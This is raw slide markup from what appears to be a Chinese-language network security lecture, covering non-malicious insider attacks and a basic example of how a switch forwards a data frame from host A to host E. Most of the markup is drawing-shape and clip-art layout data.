              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>非恶意攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通常由于粗心、知识缺乏或为了“完成工作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等无意间绕过安全策略但对系统产生了破坏的行为造成。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339970" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内部人员攻击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B3342200-07E8-4310-9319-B3198BB4699B}"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71"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5372"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F1769983-083E-4E6E-A4E3-56C7208DCCC7}"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4349" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" smtClean="0"/>
              <a:t>交换机举例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14350" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550863" y="1139825"/>
            <a:ext cx="7772400" cy="627063"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>发送数据帧到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407556" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="4664075"/>
            <a:ext cx="77724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交换机接收来自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>的数据帧</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注意在交换表中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>在交换机的接口</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上，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>在交换机的接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>上</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交换机将转发数据帧到接口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>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数据帧被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>接收 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14352"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6038" y="33401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38" name="Object 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1692275" y="3789363"/>
          <a:ext cx="409575" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s637407" name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6374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8936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7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4259263" y="3800475"/>
          <a:ext cx="409575" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s637408" name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63740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3" y="3800475"/>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8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5032375" y="3759200"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s637409" name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63740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37592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9"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2319338" y="3811588"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s637410" name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63740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9338" y="38115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53"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3875" y="33480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4238" y="3338513"/>
            <a:ext cx="457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2" name="Object 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3213100" y="3662363"/>
          <a:ext cx="407988" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s637411" name="Clip" r:id="rId12" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId12" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63741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3100" y="366236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3" name="Object 13"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3627438" y="4094163"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s637412" name="Clip" r:id="rId14" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId14" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63741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4094163"/>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4" name="Object 14"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6418263" y="3633788"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s637413" name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6374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8263" y="36337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5" name="Object 15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5702300" y="3967163"/>
          <a:ext cx="407988" cy="320675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s637414" name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63741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300" y="3967163"/>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6" name="Object 16"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1276350" y="3355975"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s637415" name="Clip" r:id="rId20" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId20" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63741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76350" y="335597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5" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1633538" y="3503613"/>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56" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2000250" y="3546475"/>
            <a:ext cx="258763" cy="284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57" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2398713" y="3573463"/>
            <a:ext cx="68262" cy="265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58" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3581400" y="3538538"/>
            <a:ext cx="328613" cy="195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59" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3878263" y="3556000"/>
            <a:ext cx="120650" cy="528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0" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4168775" y="3503613"/>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1" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5381625" y="3573463"/>
            <a:ext cx="406400"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2" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5857875" y="3546475"/>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3" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5976938" y="3476625"/>
            <a:ext cx="487362"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4364" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3905250" y="2176463"/>
            <a:ext cx="509588" cy="252412"/>
            <a:chOff x="2460" y="1371"/>
            <a:chExt cx="321" cy="159"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14402" name="Line 27"/>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403" name="Picture 28"/>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04" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2576" y="1407"/>
              <a:ext cx="84" cy="62"/>
              <a:chOff x="2576" y="1407"/>
              <a:chExt cx="84" cy="62"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14405" name="Line 30"/>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406" name="Line 31"/>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4365" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2389188" y="2409825"/>
            <a:ext cx="1581150" cy="9699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6" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4117975" y="2401888"/>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7" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4265613" y="2357438"/>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68" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2530475" y="3244850"/>
            <a:ext cx="746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4369" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4252913" y="32019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4370" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6069013" y="31511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4371" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4368800" y="2016125"/>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4372" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="965200" y="33035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4373" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1646238" y="4076700"/>
            <a:ext cx="328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4374" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2303463" y="40894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4375" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3114675" y="39100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4376" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3990975" y="4167188"/>
            <a:ext cx="327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4377" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4633913" y="3883025"/>
            <a:ext cx="322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4378" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5175250" y="4025900"/>
            <a:ext cx="33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4379" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6038850" y="41021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4380" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6784975" y="3548063"/>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4381" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6813550" y="2319338"/>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82" name="Line 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7688263" y="1970088"/>
            <a:ext cx="0" cy="237966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383" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7670800" y="1908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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>接口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14384" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7197725" y="2351088"/>
            <a:ext cx="420688"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E</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G</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14385" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7777163" y="2349500"/>
            <a:ext cx="33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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14386" name="Rectangle 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3527425" y="22479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4387" name="Rectangle 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3848100" y="2532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4388" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4273550" y="24923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14389" name="Rectangle 56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6534150" y="1911350"/>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407609" name="Line 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1698625" y="3395663"/>
            <a:ext cx="493713"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610" name="Line 58"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2424113" y="2395538"/>
            <a:ext cx="1365250" cy="85566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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1800225" y="3513138"/>
            <a:ext cx="741363" cy="303212"/>
            <a:chOff x="1134" y="2213"/>
            <a:chExt cx="467" cy="191"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14400" name="Line 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1134" y="2230"/>
              <a:ext cx="210" cy="174"/>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01" name="Line 61"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
